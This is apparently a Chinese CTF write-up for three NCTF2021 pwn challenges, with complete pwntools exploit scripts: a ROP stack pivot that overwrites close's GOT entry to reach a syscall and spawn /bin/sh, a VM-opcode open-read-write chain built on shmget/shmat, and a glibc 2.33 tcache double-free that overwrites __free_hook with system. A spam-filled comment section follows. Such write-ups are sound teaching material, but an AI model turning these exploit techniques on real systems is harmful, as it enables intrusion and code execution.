Loading... 南邮小绿草办的比赛,题目比较友好,和学弟们组队拿下了第一,奖京东E卡捏🤠 ## login ![](https://pic.imgdb.cn/item/61a652cd2ab3f51d91335ecb.png) 光秃秃,保护全开,ROP前关闭了stdout、stderr 构造栈迁移,然后选了close把它got的最低为写成'\\xa9'(这个libc版本下close函数中syscall指令的偏移) 接下来用read控rax,调close(syscall) 因为关闭了输出,所以远程getshell之后可以 `cat flag>&0`或者反弹shell exp: ```python from pwn import* #p=process('./login',env={'LD_PRELOAD':'./libc-2.31.so'}) p=process('./login') #p=remote('129.211.173.64',10005) #libc=ELF('./libc-2.31.so') elf=ELF('./login') #context.log_level='debug' def csu(func_ptr,rdi,rsi,rdx): payload=p64(0x40128a)+p64(0)+p64(1)+p64(rdi)+p64(rsi)+p64(rdx)+p64(func_ptr)+p64(0x401270) payload+=p64(0)*7 return payload main_addr=0x4011ed ret_addr=0x401220 leave_ret=0x40121f bss=0x404090 read_got=elf.got['read'] close_got=elf.got['close'] #gdb.attach(p,'b *0x40121f\nc\n') p.recvuntil("Welcome to NCTF2021!") p.send(b'a'*0x100+p64(bss+0x100)+p64(main_addr)) payload=csu(read_got,0,close_got,1)+csu(read_got,0,bss,59)+csu(close_got,bss,0,0) p.send(payload[0:0x100]+p64(bss+0x400)+p64(main_addr)) p.send(b'a'*0x100+p64(bss+0x100+0x100)+p64(main_addr)) #gdb.attach(p,'b *0x40121f\nc\n') payload=csu(read_got,0,close_got,1)+csu(read_got,0,bss,59)+csu(close_got,bss,0,0) p.send(payload[0x100:].ljust(0x100,b'\x00')+p64(bss-0x8)+p64(leave_ret)) p.send(b'\xa9') p.send(b'/bin/sh\x00'.ljust(59,b'\x00')) p.interactive() ``` ## vmstack opcode题,保护全开,ban了execve ![](https://pic.imgdb.cn/item/61a658b92ab3f51d9137582c.png) 一开始思路卡在怎么leak elf/libc/stack地址,因为没leak就写不了字符串,就不能ORW。 想了半天感觉突破口在syscall之后的返回值上,开始想有啥系统调用能返回内存中的地址的,mmap参数要求多拼不起来,brk也不是 终于找到了共享内存相关的**shmget()**、**shmat()**。好起来了 exp: ```python from pwn import* p=process('./vmstack') #p=remote('129.211.173.64',10001) context.log_level='debug' p.recvuntil("Input your op code:") #push 29,1111,0x100,0666|IPC_CREAT; pop rdx,rsi,rdi,rax; syscall shmget(key,size,shmflg) payload=b'\x00'+p64(29)+b'\x00'+p64(1111)+b'\x00'+p64(0x100)+b'\x00'+p64(950) payload+=b'\x09'+b'\x08'+b'\x07'+b'\x06' payload+=b'\x0c' #push v18;pop rdi;push 30,0,0; pop rdx,rsi,rax; syscall shmat(shm_id,shm_addr,0) payload+=b'\x01'+b'\x07' payload+=b'\x00'+p64(30)+b'\x00'+p64(0)+b'\x00'+p64(0) payload+=b'\x09'+b'\x08'+b'\x06' payload+=b'\x0c' #push v18;push v18;pop rsi;push 0,0,0x8; pop rdx,rdi,rax;push v18 syscall read() payload+=b'\x01'+b'\x01'+b'\x08' payload+=b'\x00'+p64(0)+b'\x00'+p64(0)+b'\x00'+p64(0x8) payload+=b'\x09'+b'\x07'+b'\x06' payload+=b'\x0c' #pop rdi;push rdi;push 2,0,0; pop rdx,rsi,rax; syscall open() payload+=b'\x07'+b'\x03' payload+=b'\x00'+p64(2)+b'\x00'+p64(0)+b'\x00'+p64(0) payload+=b'\x09'+b'\x08'+b'\x06' payload+=b'\x0c' #push v18;pop rdi;pop rsi;push rsi;push 0,0x30; pop rdx,rax; syscall read() payload+=b'\x01'+b'\x07' payload+=b'\x08'+b'\x04' payload+=b'\x00'+p64(0)+b'\x00'+p64(0x30) payload+=b'\x09'+b'\x06' payload+=b'\x0c' #push 1,1; pop rdi,rax; syscall write() payload+=b'\x00'+p64(1)+b'\x00'+p64(1) payload+=b'\x07'+b'\x06' payload+=b'\x0c' gdb.attach(p) p.sendline(payload.ljust(0x1000,b'\x00')) p.sendline(b'./flag\x00') #p.recv() p.interactive() ``` ## ezheap glibc2.33,我莫得环境,先整了个docker扒了个ld下来 简单double free,注意的点就是2.33的链表指针异或操作,这里free后可以view的话能算出异或前的两项的 exp: ```python from pwn import* #p=process('./ezheap',env={'LD_PRELOAD':'./libc-2.33.so'}) p=remote('129.211.173.64',10002) libc=ELF('./libc-2.33.so') #p=remote('129.211.173.64', 10002) #context.log_level='debug' def cmd(idx): p.sendlineafter(">> ",str(idx)) def alloc(size,content): cmd(1) p.sendlineafter("Size: ",str(size)) p.sendlineafter("Content: ",content) def edit(idx,content): cmd(2) p.sendlineafter("Index: ",str(idx)) p.sendlineafter("Content: ",content) def delete(idx): cmd(3) p.sendlineafter("Index: ",str(idx)) def show(idx): cmd(4) p.sendlineafter("Index: ",str(idx)) #leak for i in range(10): #0-9 alloc(0x80,b'a') for i in range(9): delete(i) show(1) tmp=u64(p.recv(8)) ptr0_11=tmp>>36 ptr0_23=((ptr0_11<<24)^tmp)>>24 ptr0_35=((ptr0_23<<12)^tmp)>>12 heap_base=ptr0_35<<12 print("heap_base: ",hex(heap_base)) show(7) leak_libc=u64(p.recv(8)) libc_base=leak_libc-0x1e0c00 print("libc_base: ",hex(libc_base)) #overlap system=libc_base+libc.symbols['system'] free_hook=libc_base+libc.symbols['__free_hook'] print('free_hook: ',hex(free_hook)) alloc(0x80,b'a') #10 delete(8) alloc(0x70,'a') #11 ptr_addr=heap_base+0x720 alloc(0x70,b'\x00'*0x8+p64(0x19)+p64(free_hook^(ptr_addr>>12))) #12 alloc(0x80,b'/bin/sh\x00') #13 alloc(0x80,p64(system)) #14 #gdb.attach(p) delete(13) p.interactive() ``` 换了ld之后本地打不通远程能打通,猜测是环境变量问题。? 最后修改:2022 年 07 月 19 日 08 : 15 PM © 允许规范转载
20 条评论
《红日2008》国产剧高清在线免费观看:https://www.jgz518.com/xingkong/31112.html
哈哈哈,写的太好了https://www.cscnn.com/
不错不错,我喜欢看 https://www.ea55.com/
想想你的文章写的特别好https://www.237fa.com/
怎么收藏这篇文章?
叼茂SEO.bfbikes.com
不错不错,我喜欢看
博主真是太厉害了!!!
陈儡瘭:文章真不错http://wap.jst-gpmx.cn/news/3464.html
555
555
555
1
1
1
1
1
1
1
555